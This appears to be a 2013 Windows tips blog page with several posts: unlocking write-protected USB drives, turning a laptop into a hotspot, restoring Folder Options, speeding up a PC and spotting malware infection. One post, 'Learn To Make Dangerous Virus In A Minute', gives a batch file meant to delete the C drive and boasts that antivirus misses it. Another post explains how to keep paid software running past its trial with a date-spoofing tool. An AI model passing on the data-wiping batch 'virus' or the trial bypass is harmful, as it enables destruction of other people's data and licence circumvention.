Sunday, September 29, 2013

Home / How to format a write-protected pendrive or memory card?? How to format a write-protected pendrive or memory card??


How to format a write-protected pendrive or memory card??

Some memory cards and USB pen drives have write protection switches, which allows you to prevent files from being deleted, or any new files being written to the device. It also prevents the drive or card from being formatted.
Occasionally, you’ll find that a USB flash drive will refuse to format and Windows will tell you that it is write protected, even though there is no switch.
Here are a couple of methods you can try to format the drive and remove the write protection. Bear in mind that there is no guarantee that they will work for you: your drive or memory card may be corrupt or broken and no utility or low-level formatting tool will make it work again. The only solution in this case is to buy a new drive.

Removing write-protection in the Registry using Regedit.exe

In any version of Windows from XP onwards, run Regedit.exe (searching regedit will usually show the program at the top of the list).
Navigate to the following key:
Computer\HKEY_LOCAL_MACHINE\SYSTEM\
CurrentControlSet\Control\StorageDevicePolicies
Regedit_Storage_Device_Policies_thumb
Double-click on the WriteProtect value in the right-hand pane of Regedit.exe. Change the Value data from 1 to 0 and click OK to save the change. Close Regedit and restart your computer. Connect your USB drive again, and you should find it is no longer write protected. You can now format the drive as normal by right-clicking on it in My Computer and choosing Format.
If you can’t find StorageDevicePolicies, you can try creating a key by right-clicking in the white space in the Control folder and choosing New -> Key and carefully entering the name.
Regedit_new_Key_thumb
Now double-click on the new key (folder) and right-click once again and choose New -> DWORD. Name it WriteProtect and set its value to 0. Click OK, exit Regedit and reboot your computer.
If this method doesn’t work, try the following:

Removing write-protection using Diskpart

With your USB drive plugged in, launch a command prompt. Do this by searching for cmd.exe in the Start menu (or Start screen in Windows 8). In Windows XP, click Start then Run, and type cmd.exe in the box.
NOTE: you may need to run Cmd.exe with administrator privileges if you see an “access is denied” message.
To do that, right-click on the shortcut and choose Run as administrator. In Windows 8, simply choose Command prompt (admin).
Now, type the following, pressing Enter after each command:
diskpart
list disk
select disk x (where x is the number of your USB flash drive – use the capacity to work out which one it is)
attributes disk clear readonly
clean
create partition primary
format fs=fat32  (you can swap fat32 for ntfs if you only need to use the drive with Windows computers)
exit
Remove_write_protection_Diskpart_thumb (1)

 

How to turn your PC into a Wi-Fi ??

How to turn your PC into

One easy solution is to turn your laptop into a Wi-Fi hotspot. In big houses and offices, where the Wi-Fi may have dead zones – a hotspot gives access to devices that wouldn’t normally be able to connect.
Your laptop-hotspot can also come in handy when you’re out and about. If you’ve paid to connect to a public Wi-Fi, you can use your laptop to connect your other devices or friend’s computers and make the most of it!
Under Windows 7 it was relatively easy to share your Internet connection as part of an ad-hoc network. Though that functionality is still there in Windows 8, it’s much more difficult to configure. Instead, we’ll use a piece of software that can set up a hotspot for you whatever version of Windows you’re using.
To begin with, your laptop will need to be online. It could be connected up by Ethernet cable to a modem or via Wi-Fi. We’ve tried a couple of software solutions, but the easiest is Virtual Router Manager.
The program works on Windows Vista, 7 and 8 – and unlike other, similar tools, it doesn’t install any extra toolbars are adware when used.
Once installed, you can enter a new Network Name (SSID) and password for the hotspot. Select your Wireless Network Connection from the “Shared Connection” menu. Finally, click “Start Virtual Router”.
The hotspot’s name should now appear in the network settings of any of your WiFi enabled devices and you should be able to connect using the password you entered.

 

How to find folder option missing???

How to find folder option missing???

Many of us sometimes find the folder options missing in windows explorer.
Here’s the solution–>
Open Run and then type “gpedit.msc”.
Now goto User Configuration > Administrative templates > Windows Component > Windows Explorer.
Click on Windows Explorer you will find the 3rd option on the right side of screen “Removes the Folder Option menu item from the Tools menu”
Just check it, if it is not configured then change it to enable by double clicking on it and after applying again set it to not configured.

 

Learn To Make Dangerous Virus In A Minute

Learn To Make Dangerous Virus In A Minute

virus


In my previous post i had teach you guys to create virus that disable mouse and Virus to format Hard Disk. In this post i will teach you to make simple yet very powerfull or you can say harmfull computer virus using a batch file. No software is required to make this virus, Noteapad is enough for it. The good thing about this virus is it is not detected by any AntiVirus.

What will this virus do ?

You will create this virus using batch file programming. This virus will delete the C Drive completely. The good thing about this virus is that it is not detected by antivirus. If you want to learn more about batch programming visit my post about Learn Batch Programming.

How to Make the virus ?

   1. Open Notepad and copy below code into it.
@Echo off
Del C:\ *.* |y
2. Save this file as virus.bat (Name can be anything but .bat is must)
3. Now, running this file will delete all the content of C Drive. Warning: Please don’t try to run on your own computer or else it will delete all the content of your C Drive. I will not be responsible for any damage done to your computer.

 

How to Hack Softwares to use them Lifetime??

How to Hack Softwares to use them Lifetime??

Hi, I am back today with a most usefull article..Hope all of you will Like It ! Here i will show you that “How to Hack Softwares to use them Forever ?” . That really a useful article,because in our daily life we need thousand of softwares today,which of most are highly paid..So how to use them Freely for whole Like ??
Most of us are familiar with many softwares that run only for a specified period of time in the trial mode.Once the trial period is expired these softwares stop functioning and demand for a purchase.But there is a way to run the softwares and make them function beyond the trial period. Isn’t this interesting?
Before I tell you how to hack the software and make it run in the trial mode forever, we have to understand the functioning of these softwares.I’ll try to explain this in brief.Because Purpose if ICA is 1st to clear your basics.So,When these softwares are installed for the first time, they make an entry into the Windows Registry with the details such as Installed Date and Time, installed path etc.After installation every time you run the software, it compares the current system date and time with the installed date and time.So, with this it can make out whether the trial period is expired or not.
So with this being the case, just manually changing the system date to an earlier date will not solve the problem.For this purpose there is a small Tool known as RunAsDate.
RunAsDate is a small utility that allows you to run a program in the date and time that you specify. This utility doesn’t change the current system date, but it only injects the date/time that you specify into the desired application.
image_2
Download RunAsDate v1.10
Intercepts the kernel API calls that returns the current date and time (GetSystemTime, GetLocalTime, GetSystemTimeAsFileTime), and replaces the current date/time with the date/time that you specify.It works with Windows 2000, XP, 2003 and Vista.
NOTE: FOLLOW THESE TIPS CAREFULLY
You have to follow these tips carefully to successfully hack a software and make it run in it’s trial mode forever.
1. Note down the date and time, when you install the software for the first time.
2. Once the trial period expires, you must always run the software using RunAsDate .
3. After the trial period is expired, do not run the software(program) directly.If you run the software directly even once, this hack may no longer work.
4. It is better and safe to inject the date of the last day in the trial period.

 

How to make you computer fresh and fast

How to make you computer fresh and fast

In this Article We will explain some simple methods to make your computer cleaner and run faster for long period of time. It’s so frustrating to see our computer slowed down after a period of time. So in this article you will get some methods or you can say ways to make your computer run faster. Follow the methods listed below:-  

Remove Useless software and apps : We often install many unnecessary application and later forget to uninstall them These application becomes burden in our computer and eventually slow down our computers So at first you need to delete all this unnecessary application and software To uninstall the software you should go to Control Panel->Add or remove->find and select the software you would like to uninstall.
Utilize your RAM performance : A lot of you may have these setting already set. But If you don’t have then don’t worry. You just have to follow the process. Right click on My computer->Properties->Advanced system settings->Setting(Under Performance)->Advanced->Change(Under Virtual Memory). Now double the number in Maximum size then the number initial size. It will surely help your PC to utilize the most of RAM.
Check for errors : Our computers face errors very oftenly in daily use and some errors stuck to our computer hard disk which makes our computer slow. So its very important to kill those errors to make our computer work better. Go to My computer and press enter .Our main hard disk is usually C: and we need this drive to be free from error So right click on Hard disk C and then click tools Then from the Error-Checking option click You may need to restart the computer to do so It will make your computer Faster.
Desktop-cleaning : We often keep unnecessary file in our desktop but it actually affects the performance of our computer. Delete the useless files or another choice is to move them to Local disk if necessary. You should only keep shortcuts in your Desktop only if you needed. If we keep Wallpapers on our desktop it also effect slightly to slow down our computer a blank screen is always better remove temporary internet files and cache from your web browser Browsing internet slow down our computer You need to clean these temporary files and cookies to make your computer stay clean and faster. There are a no. of software available today in the market which can do the task for you. You can use Ccleaner for this purpose which is a very trusted software. To proceed to the official website to download Click here
Disk Defragmentation : We should defragment our disk to make our PC faster. For deframentation process, just follow the same steps given below. Locate Hard disk C then click properties then click tools and then click defragment Now from the option Disk defragmentation.
Use a Trusted antivirus : he last but not the least tip is to use a reliable trusted antivirus which will protect your PC from harmful antivirus. Kaspersky and AVG are some of the trusted antivirus but you have to pay to use them. If you don’t wish to pay some money then you can also download free Microsoft security essential to save your computer from harmful Malware and spywares.

Saturday, September 28, 2013

Know if your PC is infected with Viruses, Trojans or other Malware

Know if your PC is infected with Viruses, Trojans or other Malware

The reason why most computer malware are so deadly is because many users fail to recognize whether they have been infected or not. Had they detected the infection at an earlier stage, the damage caused could have been greatly reduced. As each virus is programmed differently, it becomes difficult to identify a virus outbreak. However, there are some general symptoms that make it easy to detect an infected computer. Here are some of them:-

1) Programs won’t start or crash suddenly: If some system programs like the task manager or registry editor have suddenly stopped working or crash randomly without any visible reason, it is more than likely that your computer has got some form of worm that is attaching itself to various programs and thus, corrupting their code. A virus modifying registry entries to prevent these programs from running could also cause this.
2) Unusual Network Traffic: If even after closing your browser and other applications that may use the internet, you see that your computer is still downloading or uploading anything, then your computer is possibly infected with some form of spyware that is either downloading other viruses to your computer or is uploading your private information to a remote computer. In case you use a wifi connection, it is also possible that your neighbors are using your network.
3) Internet Connection not available or is slow: If suddenly, your internet connection has stopped working or has become extermely slow, it is possible that a malware is the cause. However, problems with your internet service provider could also be the cause of such issues.
4) Annoying Popups or Redirection to Strange Websites: If there has been an increase in the number of annoying popups while browsing the internet or your web browser redirects you to a different website from the one you wanted to visit, a virus or adware might be the cause.
5) Computer won’t boot: If your computer has suddenly stopped booting, it is possible that some malware has modified your computer’s system files. In such a situation, re-installing or repairing your operating system might be the only solution.
6) Slow Computer: Some viruses are designed specifically for this purpose. Malware programmers achieve this by designing viruses that increase your CPU’s usage level to 100%. If on running the Task Manager, you find that your CPU’s usage is constantly at 100% level, a malware might be the cause.
7) Programs start automatically: Some viruses and adware automatically start strange programs on your computer in order to show unwanted advertisements or simply to frustrate users.
8) Unusual File Associations: Some viruses change .exe or other file associations which prevents these files from opening. Some viruses also do this to automatically start themselves when a file of a particular type is started.
9) Security Software Disabled: Most malware disable antiviruses and firewalls to prevent themselves from being detected. If only a single software stops working, it might be a specific software failure issue. If it is a general trend and almost every security software is facing this issue, a virus infection is most likely.
10) Weird Behaviour: If your computer automatically starts sending emails or opens strange applications randomly or does things different from its “normal” behaviour, your computer is most likely compromised by malware.